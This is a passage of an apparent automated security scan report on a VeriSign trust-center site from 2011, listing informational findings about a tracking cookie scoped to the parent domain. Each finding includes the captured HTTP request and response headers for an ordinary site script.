TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:36 GMT Server: Apache Set-Cookie: TLTHID=659B664CDB2A10DB44AFB1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 1674 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript /* OnlineOpinion v4.1.7 */ /* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */ /* Create new OnlineOpini...[SNIP]...
9.62. https://trust-center.verisign.com/rcm/verisign/scripts/oo_engine_c.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/oo_engine_c.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=65897DECDB2A10DB4CEE9F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/oo_engine_c.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:35 GMT Server: Apache Set-Cookie: TLTHID=65897DECDB2A10DB4CEE9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 28368 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript /* OnlineOpinion v4.1.7 */ /* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */ var OnlineOpinion=new Ob...[SNIP]...
9.63. https://trust-center.verisign.com/rcm/verisign/scripts/popup.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/popup.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=667DD996DB2A10DB6A7CCEC4D1E75D2A; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/popup.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:37 GMT Server: Apache Set-Cookie: TLTHID=667DD996DB2A10DB6A7CCEC4D1E75D2A; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 598 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript var currentPopupId=null;function hidePopup(){if(currentPopupId){hideElement(currentPopupId);currentPopupId=null;showElementBlock("right_content");showElementBlock("right_content_1");showElementBlock(...[SNIP]...
9.64. https://trust-center.verisign.com/rcm/verisign/scripts/product_white_list.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/product_white_list.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=657CE672DB2A10DB4CED9F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/product_white_list.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:35 GMT Server: Apache Set-Cookie: TLTHID=657CE672DB2A10DB4CED9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 1005 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript var product_white_list=["SS001","SS002","SS0Y3","SS003","GS001","GS002","GS0Y3","HA001","HA002","HA0Y3","GHA001","GHA002","GHA0Y3","ABSST000"];function white_list_product(product){for(var i=0;i<produ...[SNIP]...
9.65. https://trust-center.verisign.com/rcm/verisign/scripts/quick_signin.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/quick_signin.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=64A2C5DCDB2A10DB6A76CEC4D1E75D2A; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/quick_signin.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:34 GMT Server: Apache Set-Cookie: TLTHID=64A2C5DCDB2A10DB6A76CEC4D1E75D2A; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 5155 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript var http_request=false;var targetAjaxDiv="unspecified";function callbackFunction(){if(http_request.readyState==4){if(http_request.status==200){var result=http_request.responseText;try{document.getEle...[SNIP]...
9.66. https://trust-center.verisign.com/rcm/verisign/scripts/script_log.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/script_log.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=64914668DB2A10DB44AAB1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/script_log.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:34 GMT Server: Apache Set-Cookie: TLTHID=64914668DB2A10DB44AAB1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 1408 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript var log;function getLogLevel(){if(document.getElementById("script_log")===null){return"none";}else{return document.getElementById("script_log").value;}} function generateCall(level,message){var url='...[SNIP]...
9.67. https://trust-center.verisign.com/rcm/verisign/scripts/src/dojo/dojo/dojo.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/src/dojo/dojo/dojo.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=657C9186DB2A10DB6A79CEC4D1E75D2A; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/src/dojo/dojo/dojo.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:35 GMT Server: Apache Set-Cookie: TLTHID=657C9186DB2A10DB6A79CEC4D1E75D2A; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:25 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 89269 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript /* Copyright (c) 2004-2009, The Dojo Foundation All Rights Reserved. Available via Academic Free License >= 2.1 OR the modified BSD license. see: http://dojotoolkit.org/license for details */ /* ...[SNIP]...
9.68. https://trust-center.verisign.com/rcm/verisign/scripts/syscheck.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/syscheck.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=63C826F2DB2A10DB6A72CEC4D1E75D2A; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/syscheck.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:33 GMT Server: Apache Set-Cookie: TLTHID=63C826F2DB2A10DB6A72CEC4D1E75D2A; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 1470 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript var oVal;var sessionTimerId=0;var SESSIONTIMEOUT=33*60*1000;function checkStatus(val){if(oVal!=val){window.location.reload();}} function callServer(check,orig){var localHttpObj=getXMLHttpObj();oVal=o...[SNIP]...
9.69. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDK.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/tealeaf/TealeafSDK.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=648BEF60DB2A10DB6A75CEC4D1E75D2A; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/tealeaf/TealeafSDK.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:34 GMT Server: Apache Set-Cookie: TLTHID=648BEF60DB2A10DB6A75CEC4D1E75D2A; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:09 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 57905 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript if(TeaLeaf&&TeaLeaf.Configuration&&TeaLeaf.Configuration.tlinit==false){TeaLeaf.Configuration.tlinit=true;if(!Array.prototype.push){Array.prototype.stackEnd=0;Array.prototype.push=function(a){this[thi...[SNIP]...
9.70. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=63C9FBBCDB2A10DB4CE79F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:33 GMT Server: Apache Set-Cookie: TLTHID=63C9FBBCDB2A10DB4CE79F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:09 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 22968 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript /* * Copyright . 1999-2009 TeaLeaf Technology, Inc. * All rights reserved. * * THIS SOFTWARE IS PROVIDED BY TEALEAF ``AS IS'' ...[SNIP]...
9.71. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_capture_payment.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/trustcenter_capture_payment.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=6589B492DB2A10DB4CEF9F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/trustcenter_capture_payment.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:35 GMT Server: Apache Set-Cookie: TLTHID=6589B492DB2A10DB4CEF9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:09 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 4605 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript function onPaymentMethodChange(){var paymentMethodObj=getElement("enrollment.payment.paymentMethod");if(paymentMethodObj!==null){var radioLength=paymentMethodObj.length;var index=0;for(var i=0;i<radi...[SNIP]...
9.72. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_product_selector.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/trustcenter_product_selector.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=657C8646DB2A10DB44AEB1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/trustcenter_product_selector.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:35 GMT Server: Apache Set-Cookie: TLTHID=657C8646DB2A10DB44AEB1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:09 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 19769 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript var premiumSupportFee=0;var pciComplianceFee=0;var pricingMatrix=[];var validityObjFive=null;var validityObjFour=null;var validityObjThree=null;var validityObjTwo=null;var validityObjOne=null;var pro...[SNIP]...
9.73. https://trust-center.verisign.com/rcm/verisign/scripts/utility.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/utility.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=648BC83CDB2A10DB4CE99F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
